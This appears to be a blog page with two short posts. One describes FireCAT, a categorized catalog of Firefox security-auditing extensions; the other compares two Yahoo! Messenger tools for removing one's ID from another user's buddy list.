We all know that we can do nearly everything with Firefox browser. We can check emails, download torrents, upload files to FTP, and the list goes on… Did you know that there’s a collection of extensions to turn your Firefox browser into a security platform? FireCAT stands for FireFox Catalog of Auditing Toolbox and it is a Firefox Framework Map collection of the most useful security oriented extensions. It can be used to turn your favorite browser (Firefox) into a powerful security framework.



At first I thought that FireCAT is a Firefox plugin which you can install and automatically have all 60 security extensions but I was wrong. The official website has 3 types of FireCAT files, FireCAT 1.2 Source (FreeMind), FireCAT 1.2 HTML Browsable and FireCAT 1.2 PDF. Just download the HTML browsable file and you’ll see 7 categories. Expanding the category will give you the place to download the specific extension.

1. Information Gathering
2. Proxying / Web Utilities
3. Editors
4. Security auditing
5. Network Utilities
6. Misc
7. IT Security Related

If you don’t want to try those security extensions on your Firefox browser because it might affect your browser speed, then I suggest you to install it on a Portable Firefox. This way you can have a clean and fast Firefox for browsing and then another Firefox for security auditing. Do take note that you can only run either the installed Firefox on your system or the Portable Firefox at a time.

So which is your favorite Firefox security extension featured in FireCAT?

[ Download FireCAT 1.2 HTML | PDF ]

I’ve found two application that is classified as Deny-A-Buddy (DenyBuddy & No-Buddy) program which allows you to remove your Yahoo! ID from someone elses buddy list. Quick and effective…

Simply login to the name you need to remove and then enter the persons id that you need to remove your name from and then remove it.


1. DenyBuddy

[ Download DenyBuddy ]

2. No-Buddy

[ Download No-Buddy ]

I personally prefer to use DenyBuddy because it has better status reporting than No-Buddy. It will tell you if you’ve signed on, removed your Yahoo! ID from someone elses buddy list, and even closing the application. Even the DenyBuddy Graphical User Interface (GUI) looks better than No-Buddy.